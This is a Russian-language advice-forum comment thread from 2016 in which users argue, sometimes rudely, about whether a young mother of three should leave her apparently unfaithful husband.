Мужчина ваш, вероятно, 100% уверен, что он загнобил вас настолько, что вы никуда от него не денетесь. Радует, хотя бы то, что вы осознали, что у вас есть проблема. Этот человек никогда по сути своей не изменится, и подруга здесь не при чём. Не с ней бы изменил, так с другой бы оторвался. Вы же не можете контролировать его сутками. Да и ни к чему это. Он уже давно потерял к вам уважениее, а вы тешите себя надеждами "достучаться" до него, пытаетесь в глубине души как-то оправдать. Не стройте иллюзий. Вы вполне можете изменить свою жизнь, только, конечно, не мгновенно. Прикиньте разные варианты на будущее. Пока вы финансово зависимы от мужа, он будет над вами измываться, унижать. Вам нужно чётко представлять, что вы будете делать, если решите расстаться с ним, подумать об устройстве на работу и т. д. Насчёт детей: не надо думать, что дети маленькие и ничего не понимают. Они, зато, очень хорошо чувствуют отношения родителей и для них совсем не полезно находиться в такой атмосфере недоверия и скандалов. Они вам за это спасибо не скажут. В общем, примите уже какое-то решение, хватит "сидеть в луже" и сомневаться в том, что для всех уже ясно.
Ответить
Поддерживаю Да0 / Нет0
Видеть в чудесном чудесное - вот ключ ко всем тайнам мира. Лао - Цзы
Дракон в яблоках
21249 Дракон в яблоках
Дракон в яблоках offline
Репутация : 974
Комментариев 21 0
02 июня 15:40:07
2016-06-02 15:40:07

ника777, ника777,

Хуже всего, хуже всего…да может быть и хуже, поверьте!

Но я согласна с Вами, что она сама себе ставит предлоги. Я думаю, там речь не о большущей любви. Я могу ошибаться, ведь я не знаю всех тонкостей, но складывается впечатление, что автор из под крылышка родителей, шмыгнула замуж. 17 лет, первый мужчина, розовые очки. Не успела осознать все и детки посыпались, а по сути, она сама ещё дитя. Но вернемся к нашим баранам. Я согласна с Вами, что автор ставит себе предлоги, но вот не из за большой любви и страсти, а скорее из за нежелания или боязни что-то менять. В её обращении нет слов о большой любви к мужу…она так привыкла, это её образ жизни. Судя по всему, она не привыкла принимать решения, менять что-то, она плывет по течению и многое её устраивает.

Мне было бы интересно узнать, что же в итоге решит автор, что предпримет и как сложится её жизнь. В любом случае, я желаю ей настоящего женского счастья!

Ответить
Поддерживаю Да0 / Нет0
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 16:04:59
2016-06-02 16:04:59

Дракон в яблоках, Да, кстати, я еще раз читала ее историю, и согласна с вами, что же натолкнуло выйти замуж будучи такой юной! Может ситуация заставила или не благополучная семья... Но тут как не крути, информации малова-то... Неизвестно почему вышла замуж, любила ли своего мужа... Это эпизод из ее жизни... А что было перед этим и после неизвестно, доводы, рассуждения... Вот вот, она боится перемен, потому что думает негативно по отношению к себе, пугает ее неизвестность... Ну, а кого она не пугает??? Ведь люди же живут с этим!

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Гость
Гость

02 июня 17:14:39
2016-06-02 17:14:39

Дракон в яблоках, Нравиться вижу Вам при удобном случае меня самодуром называть...

Но я в отличие от вас реально смотрю на вещи а не философствую, и не соревнуюсь показаться здесь правильным и мудрым, мне все равно кто что подумает обо мне, я смотрю на все стороны проблемы, и автор из двух зол должен выбрать наименьшее... , потому что забота о детях, чтоб они не остались голодными долг каждой матери... Хотела детей пусть теперь забудет о своей гордости и поднимает их вместе со своим любимым мужем, а не так чуть что так развод а дети мотаются по дорогам. Автор прекрасно знает что ей делать, сюда написала что бы утешить свою печальку... даже ник такой придумала...

Ответить
Поддерживаю Да0 / Нет0
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
02 июня 17:33:43
2016-06-02 17:33:43

Странные вы девочки советы даете, ни кто из вас в такой ситуации не был и дай Бог не будет!!! Алименты мизерные, соц помощи еще надо добиваться (копеечную) да, автор конечно пойдет на работу, но три рта прокормить и коммуналку оплатить, а жить на что? Не думаю что у нее есть опыт работы, а если и есть то какой? Дракон, ваша личная неприязнь достала, весь свой внутренний мир в личку пожалуйста, ведь ваш негатив автору не в помощь!!! Уходить надо было сразу, а не рожать еще двоих, теперь извините надо думать о детях, а не о себе, иначе кому они нужны кроме Вас.

Ответить
Поддерживаю Да1 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Дракон в яблоках
21249 Дракон в яблоках
Дракон в яблоках offline
Репутация : 974
Комментариев 21 0
02 июня 17:41:21
2016-06-02 17:41:21

Ночная Фурия,

Не могли бы Вы объяснить, о какой личной неприязни идет речь? И какое Вы имеете отношения к моему внутреннему миру? Если Вам не по вкусу мои комментарии, просто не читайте их!

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

02 июня 17:48:38
2016-06-02 17:48:38

Дракон в яблоках, Ну вы же о моём комментарие написали что такое мог написать только самодур, почему тогда другим указываете что читать а что нет, зачем противоречите себе...

Ответить
Поддерживаю Да0 / Нет0
Дракон в яблоках
21249 Дракон в яблоках
Дракон в яблоках offline
Репутация : 974
Комментариев 21 0
02 июня 17:50:53
2016-06-02 17:50:53

Ночная Фурия Хотя нет, не надо ничего объяснять. Мне не интересно. Извольте. Всего Вам доброго!

Ответить
Поддерживаю Да0 / Нет0
Дракон в яблоках
21249 Дракон в яблоках
Дракон в яблоках offline
Репутация : 974
Комментариев 21 0
02 июня 17:56:41
2016-06-02 17:56:41

БесШаБаШнЫй ЭлЬф )),

Грею надежду, что даже у вас осталось что-то светлое в душе.

Шутка! :) На самом деле, я не указываю кому что читать, я делаю свой выбор, Фурия свой.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

02 июня 18:00:59
2016-06-02 18:00:59

Дракон в яблоках, Вам надо попробовать себя в комедиях Шекспира, неплохо получается {#}

Ответить
Поддерживаю Да0 / Нет0
Дракон в яблоках
21249 Дракон в яблоках
Дракон в яблоках offline
Репутация : 974
Комментариев 21 0
02 июня 18:13:00
2016-06-02 18:13:00

Ворона грязью перемажет крылья. Никто и не заметит всё равно. А лебедь, несмотря на все усилья, Отмыть не сможет с белизны пятно…

Ответить
Поддерживаю Да1 / Нет0
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
02 июня 18:29:02
2016-06-02 18:29:02

Ночная Фурия, советы нормальные, особенно насчет плацдарма. Допустим, что автор намерена оставаться с мужем не смотря ни на что, однако где гарантия, что он сам от них не сбежит к какой-нибудь одинокой дамочке? А так хоть какая-то поддержка уже будет. Дом, кстати, можно попробовать сдать, а деньги откладывать на свой счет.

Ответить
Поддерживаю Да2 / Нет0
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
02 июня 18:53:26
2016-06-02 18:53:26

Farba, вот единственное о чем согласна так это плацдарм. Девушка должна быть рассудительной хитрой, а не горячей дурой и пока такая ситуация не стоит горячиться , а надо все обдумать и подготовить почву, увы на это может уйти много времени!

Ответить
Поддерживаю Да0 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
02 июня 19:00:48
2016-06-02 19:00:48

Дракон в яблоках, не устала мне писать пока я offline? Люди которые не могут сдерживать словесный понос мне не интересны больше, чем я тебе.

Ответить
Поддерживаю Да0 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Дракон в яблоках
21249 Дракон в яблоках
Дракон в яблоках offline
Репутация : 974
Комментариев 21 0
02 июня 19:11:21
2016-06-02 19:11:21

{#}

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

02 июня 19:38:11
2016-06-02 19:38:11

Дракон в яблоках, Бывают белые вороны и чёрные лебеди...

Ответить
Поддерживаю Да0 / Нет0
Милена
Милена

03 июня 14:05:37
2016-06-03 14:05:37
Извините, но у вас нет мозга. После того, что произошло в первый раз нужно было бежать, а не продолжать строить семью. Вы сами себе Накинулись на шею хомут, а теперь говорите, что он вам мешает уйти! Да вы просто этого не хотите, вас устраивает это. Родителей четвёртого, у вас же любовь.
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

03 июня 14:07:16
2016-06-03 14:07:16
Да, советов вам много дали, да ещё и за количество детей осудили))))свою судьбу мы выбираем сами и вы сейчас перед выбором, жить во лжи, или уйти с гордо поднятой головой. То что он не пытается скрывать, говорит об одном-он вас не уважает, и наверное думает.... куда она денется, будет жить и терпеть. Да , ведь и правда страшно одной с детьми... но вот в мой жизни выбора мне не оставили, я овдовела будучи беременной вторым... и выжила и доносила и родила, да не просто. , но я смогла и то что говорят, что хорошего человека не встретите-это не правда, они есть , но их мало. Я нашла и любит как родных и они его папочкой называют, особенно младшая, для которой он стал крестным отцом, как он сам говорит.... перед Богом ответственность несу. Подумайте хорошо, вы молоды, образование есть, родители, друзья... вас не оставят, и всегда помогут, какое бы решение вы не приняли. Если смогли позволить себе троих детей, значит хорошо зарабатывает, алименты на троих, поверьте... если его это не остановит, то он подонок и надо бежать.... все советы что вам дали, ставят вас в позу жертвы, а вы таковой не являетесь, вы молодая и сильная и закон и правда на вашей стороне. , поверьте в себя, полюбите себя) одно только... он не любит презервативы.... мужчина если любит, заботится и в том числе и о здоровье женщины, всех не родишь, а аборт, так по мне , живя в браке, неприемлем) вот и подумайте))) Поверьте в себя любимую и поберигите детей, им ругань и холод между родителями, куда страшнее аукнется. Мне повезло, и к вам прийдет счастье, что-то уходит, уходит плохое , приходит хорошее)
Ответить
Поддерживаю Да1 / Нет0
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
03 июня 15:02:39
2016-06-03 15:02:39

Гость, Вот именно, а она не хочет что-то менять в своей жизни, ради своих же детей... Вот мы бабы... рожаем им детей, обстирываем, еду готовим, ублажаем.... Ну не жизнь, а малина у них!!! Не ценят наш труд и заботу! Не все конечно, но такие есть! Будь ей счастье!!! Нужно проводить время с теми, кто тебя любит, понимает, уважает и ценит, а не с теми, кто в пустую тратит его, на ожидании какого-то "чуда", что он изменится, по-умнеет... Не изменится, горбатого исправит могила!!!!

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Милена
Милена

03 июня 18:22:18
2016-06-03 18:22:18
Я просто не могу понять, зачем рожать детей от человека, который спит с вашей подругой?! Но вы родили ещё двоих. А теперь говорите, что не можете уйти из-за них. Это ваша вина, вы позволили вытереть об себя ноги, и не раз. А теперь у детей два варианта: либо жить в семье, где отсутствует любовь и присутствует неуважение и обман, либо расти без отца с уставшей и грустной мамой. Вы могли подумать головой раньше, и уйти после первой измены, а не ложиться с ним в постель и тем более рожать. В этой ситуации мне жалко только детей. Я очень надеюсь, что вы поумнеете и встретите своё счастье.
Ответить
Поддерживаю Да2 / Нет0
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
06 июня 11:24:59
2016-06-06 11:24:59

Милена, Да да, детей рожают, когда в семье мир и лад! А не когда он по сторонам шастает, а она ему детей штампует...

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Штучка
21311 Штучка
Штучка online
Репутация : 41284
Комментариев 965 0
06 июня 16:25:47
2016-06-06 16:25:47
[Гость, не согласна с вами в том, что все советы ставят автора в позу жертвы. Никто её ни в какую позу не ставит. Она обратилась за помощью, и люди, желая ей помочь, высказывают своё мнение, делятся своим жизненным опытом, кто как может. Не у всех в жизни был личный негативный опыт на эту тему, как, например, у вас. Роль жертвы Автор приняла на себя сама и, похоже, ещё не готова признать и СВОЮ ответственность за то, что происходит в её жизни. Это некорректно с вашей стороны - так высказываться в адрес всех остальных пользователей сайта.
Ответить
Поддерживаю Да0 / Нет0
Видеть в чудесном чудесное - вот ключ ко всем тайнам мира. Лао - Цзы
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 173945
Комментариев 5950 9
09 июня 17:47:38
2016-06-09 17:47:38

Скорей всего он вам изменяет, но вы сами загнали себя в тупик-с 3-мя детьми вы одна не справитесь, банально не прокормите их или будете во всем им и себе отказывать(((жалко вас конечно, но я никогда не стала бы рожать столько детей от мужчины в котором не уверена!А он вам поводы давал, а вы все равно слепо верили и прощали!И еще такой момент непонятен, нафига общаться с подругой которая к вашему мужу липнет???по-моему с такими надо сразу прекращать общаться. А теперь вам остается только терпеть и надеятся непонятно на что.

Ответить
Поддерживаю Да3 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Гость
Гость

15 июня 00:04:51
2016-06-15 00:04:51
Есть знакомая семья. Знаю их близко. Работала у них няней. ( Спустя какое то время стала любовницей мужа. А с женой выпивали вместе. Она любит выпить). Они живут вместе ради детей. И мне на самом деле жалко их обоих. Она выросла без отца и уверена что у детей должен быть отец. И поэтому что бы не случилось она не уйдет. У них давно нет секса. Как она говорит, она не хочет его и он ее не удовлетворяет. У нее было много любовников. Он чувствует что она его не хочет , поэтому у них нет секса. Он не можает уехать даже на сутки из дома, она сразу начинает пить. Он не дает ей денег , опять же из за алко. Он просто ждет когда вырастут дети. Но я уверена что даже тогда он ее не оставит. Они оба ужасно несчастны. Автор я вам не желаю такой жизни. Жить с человеком ради детей не стоит. Мужчину можно заменить а счастье твое и детей важней всего.
Ответить
Поддерживаю Да0 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке